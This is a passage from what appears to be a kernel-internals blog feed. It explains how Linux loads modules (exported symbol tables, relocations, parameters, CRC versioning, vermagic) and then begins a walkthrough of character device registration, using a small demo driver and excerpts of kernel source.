<p>As for EXPORT_SYMBOL_GPL and EXPORT_SYMBOL_GPL_FUTURE, the only difference is that the section name is suffixed with “_gpl” or “_gpl_future”.
In order to let the kernel use these sections to find exported symbols, the linker must export the addresses of these sections. See <include/asm-generic/vmlinux.lds.h>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Kernel symbol table: Normal symbols */ \
__ksymtab : AT(ADDR(__ksymtab) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start___ksymtab) = .; \
*(SORT(___ksymtab+*)) \
VMLINUX_SYMBOL(__stop___ksymtab) = .; \
} \
\
/* Kernel symbol table: GPL-only symbols */ \
__ksymtab_gpl : AT(ADDR(__ksymtab_gpl) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start___ksymtab_gpl) = .; \
*(SORT(___ksymtab_gpl+*)) \
VMLINUX_SYMBOL(__stop___ksymtab_gpl) = .; \
} \
\
/* Kernel symbol table: Normal unused symbols */ \
__ksymtab_unused : AT(ADDR(__ksymtab_unused) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start___ksymtab_unused) = .; \
*(SORT(___ksymtab_unused+*)) \
VMLINUX_SYMBOL(__stop___ksymtab_unused) = .; \
} \
...
</code></pre></div></div>
<p>In <kernel/module.c> we can see the declaration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Provided by the linker */
extern const struct kernel_symbol __start___ksymtab[];
extern const struct kernel_symbol __stop___ksymtab[];
extern const struct kernel_symbol __start___ksymtab_gpl[];
extern const struct kernel_symbol __stop___ksymtab_gpl[];
extern const struct kernel_symbol __start___ksymtab_gpl_future[];
extern const struct kernel_symbol __stop___ksymtab_gpl_future[];
</code></pre></div></div>
<p>So after this, the kernel can use ‘__start___ksymtab’ and the other variables without any errors.</p>
<p>Now let’s look more closely at the “__ksymtab” section of the ELF file. First, dump this section:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># readelf --hex-dump=_ksymtab hello.ko
readelf: Warning: Section '_ksymtab' was not dumped because it does not exist!
# readelf --hex-dump=__ksymtab hello.ko
Hex dump of section '__ksymtab':
NOTE: This section has relocations against it, but these have NOT been applied to this dump.
0x00000000 00000000 00000000 00000000 00000000 ................
</code></pre></div></div>
<p>Interesting, they are all zeros! Where is our data?
If you look at the section headers more carefully, you can see some sections whose names begin with “.rela”.
There is a ‘.rela__ksymtab’ section:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># readelf -S hello.ko
There are 33 section headers, starting at offset 0x45ab8:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .note.gnu.build-i NOTE 0000000000000000 00000040
0000000000000024 0000000000000000 A 0 0 4
[ 2] .text PROGBITS 0000000000000000 00000070
0000000000000051 0000000000000000 AX 0 0 16
[ 3] .rela.text RELA 0000000000000000 00025be8
00000000000000d8 0000000000000018 I 30 2 8
[ 4] __ksymtab PROGBITS 0000000000000000 000000d0
0000000000000010 0000000000000000 A 0 0 16
[ 5] .rela__ksymtab RELA 0000000000000000 00025cc0
0000000000000030 0000000000000018 I 30 4 8
[ 6] __kcrctab PROGBITS 0000000000000000 000000e0
0000000000000008 0000000000000000 A 0 0 8
[ 7] .rela__kcrctab RELA 0000000000000000 00025cf0
</code></pre></div></div>
<p>The ‘.rela__ksymtab’ section’s type is RELA. This means it contains relocation data describing which bytes will be modified, and how, when the module is loaded into the kernel. The ‘.rela__ksymtab’ section holds the relocation data for ‘__ksymtab’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># readelf -r hello.ko | head -20
Relocation section '.rela.text' at offset 0x25be8 contains 9 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000000001 001f00000002 R_X86_64_PC32 0000000000000000 __fentry__ - 4
000000000008 00050000000b R_X86_64_32S 0000000000000000 .rodata.str1.1 + 0
00000000000d 002400000002 R_X86_64_PC32 0000000000000000 printk - 4
000000000021 001f00000002 R_X86_64_PC32 0000000000000000 __fentry__ - 4
000000000028 00050000000b R_X86_64_32S 0000000000000000 .rodata.str1.1 + f
00000000002d 002400000002 R_X86_64_PC32 0000000000000000 printk - 4
000000000041 001f00000002 R_X86_64_PC32 0000000000000000 __fentry__ - 4
000000000048 00050000000b R_X86_64_32S 0000000000000000 .rodata.str1.1 + 1f
00000000004d 002400000002 R_X86_64_PC32 0000000000000000 printk - 4
Relocation section '.rela__ksymtab' at offset 0x25cc0 contains 2 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000000000 002300000001 R_X86_64_64 0000000000000000 testexport + 0
000000000008 000600000001 R_X86_64_64 0000000000000000 __ksymtab_strings + 0
Relocation section '.rela__kcrctab' at offset 0x25cf0 contains 1 entries:
Offset Info Type Sym. Value Sym. Name + Addend
</code></pre></div></div>
<p>Here we can see that section ‘.rela__ksymtab’ has 2 entries. I will not dig into the RELA entry format; just notice that 0x23 and 0x06 are used to index the .symtab section. So when the .ko is loaded into the kernel, the first 8 bytes of section ‘__ksymtab’ will be replaced by the actual address of testexport, and the second 8 bytes will be replaced by the actual address of the string at ‘__ksymtab_strings+0’, which is “testexport”. This is how the kernel_symbol structure created by EXPORT_SYMBOL gets filled in.</p>
<h1 id="module-load-process">Module load process</h1>
<p>The init_module system call is used to load a kernel module into the kernel. The userspace application reads the .ko file into memory and passes its address and size, together with the module arguments, to this system call. init_module just allocates memory, copies the user’s data into the kernel, and then calls the function that does the actual work, load_module. In general we can split load_module into two logical parts. The first part completes the load work: allocating memory to hold the module, resolving symbols, applying relocations and so on. The second part does the remaining work: calling the module’s init function, cleaning up allocated resources and so on. Before we go to the first part, let’s look at a very important structure, ‘struct module’:
<include/linux/module.h></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct module {
enum module_state state;
/* Member of list of modules */
struct list_head list;
/* Unique handle for this module */
char name[MODULE_NAME_LEN];
/* Sysfs stuff. */
struct module_kobject mkobj;
struct module_attribute *modinfo_attrs;
const char *version;
const char *srcversion;
struct kobject *holders_dir;
/* Exported symbols */
const struct kernel_symbol *syms;
const unsigned long *crcs;
unsigned int num_syms;
/* Kernel parameters. */
struct kernel_param *kp;
unsigned int num_kp;
...
}
</code></pre></div></div>
<p>Here I just list some of the fields of ‘struct module’. It represents a module in the kernel and contains the module’s information. For example, ‘state’ indicates the status of the module and changes during the load process, ‘list’ links all of the modules in the kernel, and ‘name’ contains the module name.
Below are some important functions that load_module calls.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>load_module
-->layout_and_allocate
-->setup_load_info
-->rewrite_section_headers
-->layout_sections
-->layout_symtab
-->move_module
-->find_module_sections
-->simplify_symbols
-->apply_relocations
-->parse_args
-->do_init_module
</code></pre></div></div>
<p>The rewrite_section_headers function replaces each section header’s ‘sh_addr’ field with the section’s real address in memory. Then in setup_load_info, ‘mod’ is initialized with the real address of the “.gnu.linkonce.this_module” section. This section contains data the compiler set up for us. In the source directory, we can see a hello.mod.c file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__visible struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
.name = KBUILD_MODNAME,
.init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
.exit = cleanup_module,
#endif
.arch = MODULE_ARCH_INIT,
};
</code></pre></div></div>
<p>So here we can see that ‘mod’ will have some fields pre-filled. The interesting thing here is that the init function is init_module, not our hello_init. The magic is done by module_init
as follows (include/linux/init.h):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Each module must use one module_init(). */
#define module_init(initfn) \
static inline initcall_t __inittest(void) \
{ return initfn; } \
int init_module(void) __attribute__((alias(#initfn)));
</code></pre></div></div>
<p>From here we can see that the compiler sets ‘init_module’ as an alias of our init function, which is ‘hello_init’ in our example.
Next, the function ‘layout_sections’ calculates the ‘core’ size and ‘init’ size of the ELF file. Then, if CONFIG_KALLSYMS is defined, ‘layout_symtab’ is called and the symbol info is added to the core section.
After calculating the core and init sections, ‘move_module’ allocates space for them and copies the original section data to the new space. So the sections’ sh_addr must also be updated, and then the ‘mod’ address is updated.</p>
<p>mod = (void *)info->sechdrs[info->index.mod].sh_addr;</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> core section
+------------+ <-----mod->module_core
+-> | |
| +------------+
+------------+ +---> | |
| ELF header | | | +------------+
+------------+ | | | |
| section 0 +---+ +------------+
+------------+ |
| section 1 +----+
+------------+ | | init section
| section 2 +----+ +------------+ <-----mod->module_init
+------------+ | +-> | |
| section 3 +-+ | +------------+
+------------+ +-> | ||
|sec head table +------------+
+------------+ | |
| |
+------------+
</code></pre></div></div>
<p>So for now, we have the layout shown above.</p>
<p>Later, ‘load_module’ calls ‘find_module_sections’ to get the exported symbols.
Next, it calls ‘simplify_symbols’ to fix up the symbols. The function call chain is
simplify_symbols-->resolve_symbol_wait-->resolve_symbol-->find_symbol-->each_symbol_section.
The last function first iterates over the kernel’s exported symbols and then over the loaded modules’ symbols.
If ‘resolve_symbol’ succeeds, it calls ‘ref_module’ to establish the dependency between the currently loading module and the module owning the symbol it uses. This is done in ‘add_module_usage’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int add_module_usage(struct module *a, struct module *b)
{
struct module_use *use;
pr_debug("Allocating new usage for %s.\n", a->name);
use = kmalloc(sizeof(*use), GFP_ATOMIC);
if (!use) {
pr_warn("%s: out of memory loading\n", a->name);
return -ENOMEM;
}
use->source = a;
use->target = b;
list_add(&use->source_list, &b->source_list);
list_add(&use->target_list, &a->target_list);
return 0;
}
</code></pre></div></div>
<p>Here a is the currently loading module, and b is the module whose symbol a uses.
module->source_list links the modules that depend on this module, and module->target_list links the modules it depends on.</p>
<p>After fixing up the symbols, ‘load_module’ does relocation by calling ‘apply_relocations’. If a section’s type is ‘SHT_REL’ or ‘SHT_RELA’, ‘apply_relocations’ calls the arch-specific function. As the symbol table has already been resolved, this relocation is much simpler. Now the module’s exported symbol addresses have been corrected to the right values.</p>
<p>Next, ‘load_module’ calls ‘parse_args’ to parse the module parameters. Let’s first look at how a parameter is defined in a kernel module.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool __read_mostly fasteoi = 1;
module_param(fasteoi, bool, S_IRUGO);
#define module_param(name, type, perm) \
module_param_named(name, name, type, perm)
#define module_param_named(name, value, type, perm) \
param_check_##type(name, &(value)); \
module_param_cb(name, &param_ops_##type, &value, perm); \
__MODULE_PARM_TYPE(name, #type)
#define module_param_cb(name, ops, arg, perm) \
__module_param_call(MODULE_PARAM_PREFIX, name, ops, arg, perm, -1, 0)
#define __module_param_call(prefix, name, ops, arg, perm, level, flags) \
/* Default value instead of permissions? */ \
static const char __param_str_##name[] = prefix #name; \
static struct kernel_param __moduleparam_const __param_##name \
__used \
__attribute__ ((unused,__section__ ("__param"),aligned(sizeof(void *)))) \
= { __param_str_##name, ops, VERIFY_OCTAL_PERMISSIONS(perm), \
level, flags, { arg } }
</code></pre></div></div>
<p>Let’s expand this for the ‘fasteoi’ parameter.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>param_check_bool(fasteoi, &(fasteoi));
static const char __param_str_fasteoi[] = "fasteoi";
static struct kernel_param __moduleparam_const __param_fasteoi \
__used
__attribute__ ((unused,__section__ ("__param"),aligned(sizeof(void *)))) \
= { __param_str_fasteoi, &param_ops_bool, VERIFY_OCTAL_PERMISSIONS(S_IRUGO), \
-1, 0, { &fasteoi} }
</code></pre></div></div>
<p>So here we can see that ‘module_param(fasteoi, bool, S_IRUGO);’ defines a ‘struct kernel_param’ variable and stores it in section ‘__param’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kernel_param {
const char *name;
const struct kernel_param_ops *ops;
u16 perm;
s8 level;
u8 flags;
union {
void *arg;
const struct kparam_string *str;
const struct kparam_array *arr;
};
};
</code></pre></div></div>
<p>The union member ‘arg’ holds the kernel parameter’s address.</p>
<p>Userspace passes the module-specific arguments to load_module in the ‘uargs’ argument.
‘parse_args’ parses the parameters one by one, compares each against the entries in section ‘__param’, and then writes the user-specified value through the matching entry:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int param_set_bool(const char *val, const struct kernel_param *kp)
{
/* No equals means "set"... */
if (!val) val = "1";
/* One of =[yYnN01] */
return strtobool(val, kp->arg);
}
int strtobool(const char *s, bool *res)
{
switch (s[0]) {
case 'y':
case 'Y':
case '1':
*res = true;
break;
case 'n':
case 'N':
case '0':
*res = false;
break;
default:
return -EINVAL;
}
return 0;
}
</code></pre></div></div>
<h2 id="version-control">Version control</h2>
<p>One thing we have not yet covered is version control. Version control keeps kernel and module consistent: we can’t load a module compiled for a 2.6 kernel into a 3.2 kernel. That’s why version control is needed. Kernel and module use CRC checksums for this. The idea behind it is quite simple: the build tools generate a CRC checksum for every exported function and for every function the module references. Then in ‘load_module’, the two CRCs are compared. To support this mechanism, the kernel config must contain ‘CONFIG_MODVERSIONS’. In the EXPORT_SYMBOL macro, there is a __CRC_SYMBOL definition.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#ifdef CONFIG_MODVERSIONS
/* Mark the CRC weak since genksyms apparently decides not to
* generate a checksums for some symbols */
#define __CRC_SYMBOL(sym, sec) \
extern __visible void *__crc_##sym __attribute__((weak)); \
static const unsigned long __kcrctab_##sym \
__used \
__attribute__((section("___kcrctab" sec "+" #sym), unused)) \
= (unsigned long) &__crc_##sym;
#else
#define __CRC_SYMBOL(sym, sec)
#endif
</code></pre></div></div>
<p>Expanding it for our testexport symbol gives:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>extern __visible void *__crc_testexport;
static const unsigned long __kcrctab_testexport = (unsigned long) &__crc_testexport;
</code></pre></div></div>
<p>So for every exported symbol, the build tools generate a CRC checksum and store it in section ‘__kcrctab’.</p>
<p>Now back to the module load process. In hello.mod.c we can see the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const struct modversion_info ____versions[]
__used
__attribute__((section("__versions"))) = {
{ 0x21fac097, __VMLINUX_SYMBOL_STR(module_layout) },
{ 0x27e1a049, __VMLINUX_SYMBOL_STR(printk) },
{ 0xbdfb6dbb, __VMLINUX_SYMBOL_STR(__fentry__) },
};
struct modversion_info {
unsigned long crc;
char name[MODULE_NAME_LEN];
};
</code></pre></div></div>
<p>The ELF file has an array of struct modversion_info stored in section ‘__versions’; every element has a crc and a name identifying a symbol the module references.</p>
<p>In ‘resolve_symbol’, when the symbol is found, ‘check_version’ is called. ‘check_version’ iterates over ‘__versions’ and compares the found symbol’s CRC checksum. If they are the same, the check passes.</p>
<h2 id="modinfo">Modinfo</h2>
<p>A .ko file also contains a ‘.modinfo’ section which stores some module information. The modinfo program can show this information. In the source code, one can use ‘MODULE_INFO’ to add it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define MODULE_INFO(tag, info) __MODULE_INFO(tag, tag, info)
#ifdef MODULE
#define __MODULE_INFO(tag, name, info) \
static const char __UNIQUE_ID(name)[] \
__used __attribute__((section(".modinfo"), unused, aligned(1))) \
= __stringify(tag) "=" info
#else /* !MODULE */
/* This struct is here for syntactic coherency, it is not used */
#define __MODULE_INFO(tag, name, info) \
struct __UNIQUE_ID(name) {}
#endif
</code></pre></div></div>
<p>MODULE_INFO just defines a key=value string in the ‘.modinfo’ section when MODULE is defined. MODULE_INFO is used in several places, such as license and vermagic:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define MODULE_LICENSE(_license) MODULE_INFO(license, _license)
/*
* Author(s), use "Name <email>" or just "Name", for multiple
* authors use multiple MODULE_AUTHOR() statements/lines.
*/
#define MODULE_AUTHOR(_author) MODULE_INFO(author, _author)
/* What your module does. */
#define MODULE_DESCRIPTION(_description) MODULE_INFO(description, _description)
MODULE_INFO(vermagic, VERMAGIC_STRING);
</code></pre></div></div>
<h2 id="vermagic">vermagic</h2>
<p>vermagic is a string generated from kernel configuration information. ‘load_module’ checks it in ‘layout_and_allocate’->‘check_modinfo’->‘same_magic’. ‘VERMAGIC_STRING’ is generated from the kernel configuration.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define VERMAGIC_STRING \
UTS_RELEASE " " \
MODULE_VERMAGIC_SMP MODULE_VERMAGIC_PREEMPT \
MODULE_VERMAGIC_MODULE_UNLOAD MODULE_VERMAGIC_MODVERSIONS \
MODULE_ARCH_VERMAGIC
</code></pre></div></div>
<p>After this tough work, ‘load_module’ reaches the final step: calling ‘do_init_module’.
If the module has an init function, ‘do_init_module’ calls it through ‘do_one_initcall’. It then changes the module’s state to ‘MODULE_STATE_LIVE’, calls the functions registered on the ‘module_notify_list’ list, and finally frees the init section of the module.</p>
<h1 id="unload-module">Unload module</h1>
<p>Unloading a module is quite easy. It is done by the syscall ‘delete_module’, which takes only the module name as argument. It first finds the module in the modules list, then checks whether other modules depend on it, then calls the module’s exit function, and finally notifies the modules interested in module unload by iterating ‘module_notify_list’.</p>
Anatomy of the Linux character devices2018-06-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/02/linux-character-devices
<p>The character device is one of the classes of Linux devices; other classes include block devices and network devices. Every class of devices has its own support infrastructure in the kernel, often called the device driver model. This article will discuss the simple character device model.</p>
<p>First we need to prepare a simple character device driver and a user program that uses it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian986:~# cat demo_chr_dev.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/cdev.h>
static struct cdev chr_dev;
static dev_t ndev;
static int chr_open(struct inode *nd, struct file *filp)
{
int major = MAJOR(nd->i_rdev);
int minor = MINOR(nd->i_rdev);
printk("chr_open, major = %d, minor = %d\n", major, minor);
return 0;
}
static ssize_t chr_read(struct file *f, char __user *u, size_t count, loff_t *off)
{
printk("In the chr_read() function\n");
return 0;
}
struct file_operations chr_ops =
{
.owner = THIS_MODULE,
.open = chr_open,
.read = chr_read,
};
static int demo_init(void)
{
int ret;
cdev_init(&chr_dev, &chr_ops);
ret = alloc_chrdev_region(&ndev, 0, 1, "chr_dev");
if(ret < 0)
return ret;
printk("demo_init():major = %d, minor = %d\n",MAJOR(ndev), MINOR(ndev));
ret = cdev_add(&chr_dev, ndev, 1);
if(ret < 0)
return ret;
return 0;
}
static void demo_exit(void)
{
printk("Removing chr_dev module...\n");
cdev_del(&chr_dev);
unregister_chrdev_region(ndev, 1);
}
module_init(demo_init);
module_exit(demo_exit);
MODULE_LICENSE("GPL");
root@debian986:~# cat Makefile
obj-m := demo_chr_dev.o
KERNELDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
default:
$(MAKE) -C $(KERNELDIR) M=$(PWD) modules
clean:
rm -f *.o *.ko *.mod.c
</code></pre></div></div>
<p>The userspace program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian986:~# cat main.c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#define CHR_DEV_NAME "/dev/chr_dev"
int main()
{
int ret;
char buf[32];
int fd = open(CHR_DEV_NAME, O_RDONLY | O_NDELAY);
if(fd < 0)
{
printf("open file %s failed\n", CHR_DEV_NAME);
return -1;
}
read(fd, buf, 32);
close(fd);
return 0;
}
</code></pre></div></div>
<p>First install the .ko; using dmesg we can see the major and minor number of the device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [ 917.528480] demo_init():major = 249, minor = 0
</code></pre></div></div>
<p>Then we use mknod to create an entry in the /dev directory:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian986:~# mknod /dev/chr_dev c 249 0
</code></pre></div></div>
<p>Now we have a character device. Running the main program, dmesg shows that the open and read functions have been executed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [ 978.055050] chr_open, major = 249, minor = 0
[ 978.055055] In the chr_read() function
</code></pre></div></div>
<h1 id="character-device-abstract">character device abstract</h1>
<p>The Linux kernel uses struct ‘cdev’ to represent character devices.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //<include/linux/cdev.h>
struct cdev {
struct kobject kobj;
struct module *owner;
const struct file_operations *ops;
struct list_head list;
dev_t dev;
unsigned int count;
};
</code></pre></div></div>
<p>The most important field here is ‘struct file_operations’, which defines the interface to the virtual file system: when the user program triggers a system call like open/read/write, it finally reaches the functions that ops defines.</p>
<p>‘dev’ here represents the device number, containing major and minor.</p>
<p>‘list’ links all of the character devices in the system.
cdev’s initialization:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //<fs/char_dev.c>
void cdev_init(struct cdev *cdev, const struct file_operations *fops)
{
memset(cdev, 0, sizeof *cdev);
INIT_LIST_HEAD(&cdev->list);
kobject_init(&cdev->kobj, &ktype_cdev_default);
cdev->ops = fops;
}
</code></pre></div></div>
<h1 id="device-number">device number</h1>
<p>Every device has a device number, which is a combination of a major and a minor number. The major number identifies the device driver, and the minor number identifies a specific device among those managed by that driver.</p>
<p>‘dev_t’ is used to represent a device number; it is a 32-bit unsigned integer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //<include/linux/types.h>
typedef __u32 __kernel_dev_t;
typedef __kernel_fd_set fd_set;
typedef __kernel_dev_t dev_t;
</code></pre></div></div>
<p>Its high 12 bits represent the major number and its low 20 bits represent the minor number.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //<include/linux/kdev_t.h>
#define MINORBITS 20
#define MAJOR(dev) ((unsigned int) ((dev) >> MINORBITS))
#define MINOR(dev) ((unsigned int) ((dev) & MINORMASK))
</code></pre></div></div>
<p>A device number can be allocated by two functions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> register_chrdev_region
alloc_chrdev_region
</code></pre></div></div>
<p>The kernel uses the global variable ‘chrdevs’ to manage device number allocation:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static struct char_device_struct {
struct char_device_struct *next;
unsigned int major;
unsigned int baseminor;
int minorct;
char name[64];
struct cdev *cdev; /* will die */
} *chrdevs[CHRDEV_MAJOR_HASH_SIZE];
</code></pre></div></div>
<p>‘register_chrdev_region’ records the device number in the chrdevs array.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int register_chrdev_region(dev_t from, unsigned count, const char *name)
{
struct char_device_struct *cd;
dev_t to = from + count;
dev_t n, next;
for (n = from; n < to; n = next) {
next = MKDEV(MAJOR(n)+1, 0);
if (next > to)
next = to;
cd = __register_chrdev_region(MAJOR(n), MINOR(n),
next - n, name);
if (IS_ERR(cd))
goto fail;
}
return 0;
fail:
to = n;
for (n = from; n < to; n = next) {
next = MKDEV(MAJOR(n)+1, 0);
kfree(__unregister_chrdev_region(MAJOR(n), MINOR(n), next - n));
}
return PTR_ERR(cd);
}
</code></pre></div></div>
<p>The real work is done by ‘__register_chrdev_region’, which takes a major number, a base minor and a count of minors. This function inserts the entry into the chrdevs array.
Of course we first need to get the index:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> i = major_to_index(major);
</code></pre></div></div>
<p>Then ‘__register_chrdev_region’ checks whether the new entry conflicts with the existing ones; if not, it is added to the chrdevs entry. Below shows the state after major numbers 2 and 257 have been inserted:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +------------------+
0 | |
+------------------+
1 | | struct char_device_struct
+------------------+
2 | +-------> +---------------+---> +---------------+
+------------------+ | next | | next |
| | +---------------+ +---------------+
| | | major=2 | | major=257 |
| | +---------------+ +---------------+
| | | baseminor=0 | | baseminor=0 |
| | +---------------+ +---------------+
| | | minorct=1 | | minorct=4 |
| | +---------------+ +---------------+
| | | "augdev" | | "devmodev" |
| | +---------------+ +---------------+
+------------------+
254 | |
+------------------+
</code></pre></div></div>
<p>‘alloc_chrdev_region’ differs from ‘register_chrdev_region’ in that the former asks the kernel to allocate a usable major number instead of specifying one. It iterates chrdevs from the last entry and finds an empty one, returning its index as the major number.</p>
<h1 id="character-device-registration">character device registration</h1>
<p>After initializing the char device and allocating the device number, we need to register this char device with the system. This is done by the ‘cdev_add’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int cdev_add(struct cdev *p, dev_t dev, unsigned count)
{
int error;
p->dev = dev;
p->count = count;
error = kobj_map(cdev_map, dev, count, NULL,
exact_match, exact_lock, p);
if (error)
return error;
kobject_get(p->kobj.parent);
return 0;
}
</code></pre></div></div>
<p>Quite simple: ‘p’ is the device to be added, ‘dev’ is the device number, and count is the number of devices.</p>
<p>The core is the call to kobj_map. ‘kobj_map’ adds the char device to the hash table of the global variable ‘cdev_map’, which is defined as:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct kobj_map *cdev_map;
struct kobj_map {
struct probe {
struct probe *next;
dev_t dev;
unsigned long range;
struct module *owner;
kobj_probe_t *get;
int (*lock)(dev_t, void *);
void *data;
} *probes[255];
struct mutex *lock;
};
</code></pre></div></div>
<p>Here the ‘probes’ field is like the ‘chrdevs’ array: every entry represents a class of devices. Majors with the same value mod 255 share the same entry.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kobj_map(struct kobj_map *domain, dev_t dev, unsigned long range,
struct module *module, kobj_probe_t *probe,
int (*lock)(dev_t, void *), void *data)
{
unsigned n = MAJOR(dev + range - 1) - MAJOR(dev) + 1;
unsigned index = MAJOR(dev);
unsigned i;
struct probe *p;
if (n > 255)
n = 255;
p = kmalloc(sizeof(struct probe) * n, GFP_KERNEL);
if (p == NULL)
return -ENOMEM;
for (i = 0; i < n; i++, p++) {
p->owner = module;
p->get = probe;
p->lock = lock;
p->dev = dev;
p->range = range;
p->data = data;
}
mutex_lock(domain->lock);
for (i = 0, p -= n; i < n; i++, p++, index++) {
struct probe **s = &domain->probes[index % 255];
while (*s && (*s)->range < range)
s = &(*s)->next;
p->next = *s;
*s = p;
}
mutex_unlock(domain->lock);
return 0;
}
</code></pre></div></div>
<p>‘kobj_map’ first allocates the probes and then inserts them into one of the ‘cdev_map’ probes entries.
Below shows the state after calling ‘cdev_add’ for two majors satisfying major % 255 == 2.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +------------------+
0 | |
+------------------+
1 | | struct probe
+------------------+
2 | +-------> +-------------------> +---------------+
+------------------+ | next | | next |
| | +---------------+ +---------------+
probes[255]| | | dev | | |
| | +---------------+ +---------------+
| | | | | |
| | +---------------+ +---------------+
| | | lock | | |
| | +---------------+ +---------------+
| | | data +--+ | data |
| | +---------------+ | +---------------+
+------------------+ |
254 | | v
+------------------+ +--------------+
| |
+--------------+
| |
+--------------+
| |
+--------------+
| |
+--------------+
struct cdev
</code></pre></div></div>
<p>After calling ‘cdev_add’, the char device has been added to the system and the kernel can find it when needed. Before our user program can call the char device driver’s functions, we need to make a node in the VFS to bridge the program and the device driver.</p>
<h1 id="make-device-file-node">make device file node</h1>
<p>A device file bridges the userspace program and the kernel driver. As we know, in Linux everything is a file, so if we want to export the driver’s service to user programs, we must make an entry in the VFS. Calling the mknod program in userspace finally issues a ‘mknod’ system call.
The kernel then allocates an inode in the filesystem. For now, we will just consider how to connect the VFS and the char device driver, and omit how the VFS connects to the specific filesystem.
‘vfs_mknod’ calls the specific filesystem’s mknod function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int vfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode, dev_t dev)
{
int error = may_create(dir, dentry);
if (error)
return error;
if ((S_ISCHR(mode) || S_ISBLK(mode)) && !capable(CAP_MKNOD))
return -EPERM;
if (!dir->i_op->mknod)
return -EPERM;
error = devcgroup_inode_mknod(mode, dev);
if (error)
return error;
error = security_inode_mknod(dir, dentry, mode, dev);
if (error)
return error;
error = dir->i_op->mknod(dir, dentry, mode, dev);
if (!error)
fsnotify_create(dir, dentry);
return error;
}
</code></pre></div></div>
<p>We will use the shmem filesystem as an example; its inode operations are ‘shmem_dir_inode_operations’.
So it calls ‘shmem_mknod’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int
shmem_mknod(struct inode *dir, struct dentry *dentry, umode_t mode, dev_t dev)
{
struct inode *inode;
int error = -ENOSPC;
inode = shmem_get_inode(dir->i_sb, dir, mode, dev, VM_NORESERVE);
if (inode) {
error = simple_acl_create(dir, inode);
if (error)
goto out_iput;
error = security_inode_init_security(inode, dir,
&dentry->d_name,
shmem_initxattrs, NULL);
if (error && error != -EOPNOTSUPP)
goto out_iput;
error = 0;
dir->i_size += BOGO_DIRENT_SIZE;
dir->i_ctime = dir->i_mtime = CURRENT_TIME;
d_instantiate(dentry, inode);
dget(dentry); /* Extra count - pin the dentry in core */
}
return error;
out_iput:
iput(inode);
return error;
}
</code></pre></div></div>
<p>In ‘shmem_get_inode’, it allocates a new inode which represents our newly created device, /dev/chr_dev in our case. As our file is a character device, it is special, so ‘init_special_inode’ is called.</p>
